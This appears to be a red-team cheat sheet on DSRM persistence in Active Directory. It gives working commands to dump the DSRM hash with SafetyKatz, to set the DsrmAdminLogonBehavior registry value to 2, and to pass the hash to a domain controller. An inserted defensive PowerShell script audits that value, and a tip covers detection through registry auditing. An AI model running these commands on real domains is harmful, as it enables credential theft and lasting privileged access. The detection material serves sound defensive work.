# dsrm

DSRM is Directory Services Restore Mode. Every domain controller has a local administrator account named "Administrator" whose password is the DSRM password.

The DSRM password (SafeModePassword) is set when a server is promoted to Domain Controller and is rarely changed afterwards. After altering a registry setting on the DC, it is possible to pass the NTLM hash of this account to access the DC.

## Methodology

1. Dump the DSRM password.
2. Change the logon behavior for the DSRM account.
3. Pass-The-Hash.

## Binaries

> [!INFO] Remember to follow the Binaries methodology

### SafetyKatz

**Dump local admin DSRM password on the domain controller:**

```batchfile
SafetyKatz.exe '"token::elevate" "lsadump::sam"'
```

Since this is the 'local' administrator of the DC, its hash can be passed to authenticate. However, the logon behavior for the DSRM account must be changed before the hash can be used.

**Change login behavior for the local admin on the DC:**

```powershell
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```

```batchfile
winrs -r:dcorp-dc cmd
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
```

**If property already exists**

```powershell
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
```
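The `DsrmAdminLogonBehavior` value is the artifact a defender should be watching for: `0` (or absent) is the default and only allows the DSRM account to log on when the DC is booted into DSRM, `1` allows logon when AD DS is stopped, and `2` allows logon at any time. The following audit script is an added example, not part of the original notes or any tool they reference. It assumes WinRM access to the domain controllers and the `ActiveDirectory` module for enumerating them; `$DomainController` is a hypothetical parameter name.

```powershell
# Added defensive audit (example code, not from the original page).
# Queries every DC for DsrmAdminLogonBehavior and flags any non-default value.
# Assumes: WinRM reachable on each DC, ActiveDirectory module available locally.
param(
    [string[]]$DomainController = (Get-ADDomainController -Filter * |
        Select-Object -ExpandProperty HostName)
)

$regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Documented meaning of each value (0 is also the behaviour when the value is absent).
$meaning = @{
    0 = 'default: DSRM account usable only when booted into DSRM'
    1 = 'DSRM logon allowed while AD DS is stopped'
    2 = 'DSRM logon allowed at any time (persistence indicator)'
}

$raw = Invoke-Command -ComputerName $DomainController -ArgumentList $regPath, $valueName -ScriptBlock {
    param($regPath, $valueName)
    $item = Get-ItemProperty -Path $regPath -Name $valueName -ErrorAction SilentlyContinue
    $present = ($null -ne $item)
    $value = 0
    if ($present) { $value = [int]$item.$valueName }
    [pscustomobject]@{
        DC      = $env:COMPUTERNAME
        Present = $present
        Value   = $value
    }
}

$report = foreach ($r in $raw) {
    $v = [int]$r.Value
    $finding = 'OK'
    if ($v -ne 0) { $finding = 'ALERT' }
    [pscustomobject]@{
        DC                     = $r.DC
        ValuePresent           = $r.Present
        DsrmAdminLogonBehavior = $v
        Finding                = $finding
        Meaning                = $meaning[$v]
    }
}

$report | Sort-Object Finding -Descending | Format-Table -AutoSize
```

Run it from a management host with a privileged account; any DC reporting `ALERT` should be investigated and the value reset to `0` (or removed) once the change is understood. Because the value is rarely legitimate outside a planned recovery, a SACL on the `Lsa` key combined with registry object-access auditing (event ID 4657) gives a low-noise detection for the modification itself.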

**Pass The hash:**

```batchfile
SafetyKatz.exe '"sekurlsa::pth /domain:contoso.local /user:Administrator /ntlm:917ecdd1b4287f7051542d0241900cf0 /run:powershell.exe"'
```
